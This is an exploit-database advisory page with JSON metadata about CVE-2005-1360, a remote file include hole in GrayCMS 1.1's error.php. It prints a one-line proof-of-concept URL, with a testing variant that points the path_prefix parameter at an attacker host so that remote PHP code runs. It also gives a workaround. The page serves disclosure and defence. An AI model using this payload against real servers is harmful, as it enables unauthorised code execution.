GrayCMS 1.1 Error.PHP Remote File Include Vulnerability
2005-04-26T00:00:00
ID EDB-ID:25538 Type exploitdb Reporter Kold Modified 2005-04-26T00:00:00
Description
GrayCMS 1.1 Error.PHP Remote File Include Vulnerability. CVE-2005-1360. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/13381/info
GrayCMS is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/CMS/gcms/code/error.php?path_prefix=http://www.example.com/
{"id": "EDB-ID:25538", "hash": "49c6f7db7795f6bff7e9d9349e46b1ec", "type": "exploitdb", "bulletinFamily": "exploit", "title": "GrayCMS 1.1 Error.PHP Remote File Include Vulnerability", "description": "GrayCMS 1.1 Error.PHP Remote File Include Vulnerability. CVE-2005-1360. Webapps exploit for php platform", "published": "2005-04-26T00:00:00", "modified": "2005-04-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/25538/", "reporter": "Kold", "references": [], "cvelist": ["CVE-2005-1360"], "lastseen": "2016-02-03T01:36:00", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-02-03T01:36:00"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-1360"]}, {"type": "osvdb", "idList": ["OSVDB:15860"]}], "modified": "2016-02-03T01:36:00"}, "vulnersScore": 7.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/25538/", "sourceData": "source: http://www.securityfocus.com/bid/13381/info\r\n\r\nGrayCMS is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.\r\n\r\nAn attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. \r\n\r\nhttp://www.example.com/CMS/gcms/code/error.php?path_prefix=http://www.example.com/ ", "osvdbidlist": ["15860"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:13", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in error.php in GrayCMS 1.1 allows remote attackers to execute arbitrary PHP code by modifying the path_prefix parameter to reference a URL on a remote web server that contains the code.", "modified": "2017-07-11T01:32:00", "id": "CVE-2005-1360", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1360", "published": "2005-05-02T04:00:00", "title": "CVE-2005-1360", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:11", "bulletinFamily": "software", "description": "## Vulnerability Description\nGrayCMS contains a flaw that may allow a remote attacker to execute arbitrary commands. If register_globals is enabled, the issue is due to \"code/error.php\" not properly sanitizing user input supplied to the \"path_prefix\" parameter. This may allow a remote attacker to send a specially-crafted URL and include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): \n\nExploitation of this vulnerability may not be possible unless both the 'allow_url_fopen' and 'register_globals' directives are enabled in the local site PHP configuration. As a workaround, it is recommended to disable these PHP directives.\n## Short Description\nGrayCMS contains a flaw that may allow a remote attacker to execute arbitrary commands. If register_globals is enabled, the issue is due to \"code/error.php\" not properly sanitizing user input supplied to the \"path_prefix\" parameter. This may allow a remote attacker to send a specially-crafted URL and include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[victim]/CMS/gcms/code/error.php?path_prefix=http://[attacker]/\n## References:\nVendor URL: http://gcms.graymur.net/\n[Secunia Advisory ID:15133](https://secuniaresearch.flexerasoftware.com/advisories/15133/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0433.html\nISS X-Force ID: 20278\nFrSIRT Advisory: ADV-2005-0403\n[CVE-2005-1360](https://vulners.com/cve/CVE-2005-1360)\nBugtraq ID: 13381\n", "modified": "2005-04-26T12:00:14", "published": "2005-04-26T12:00:14", "href": "https://vulners.com/osvdb/OSVDB:15860", "id": "OSVDB:15860", "title": "GrayCMS error.php path_prefix Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
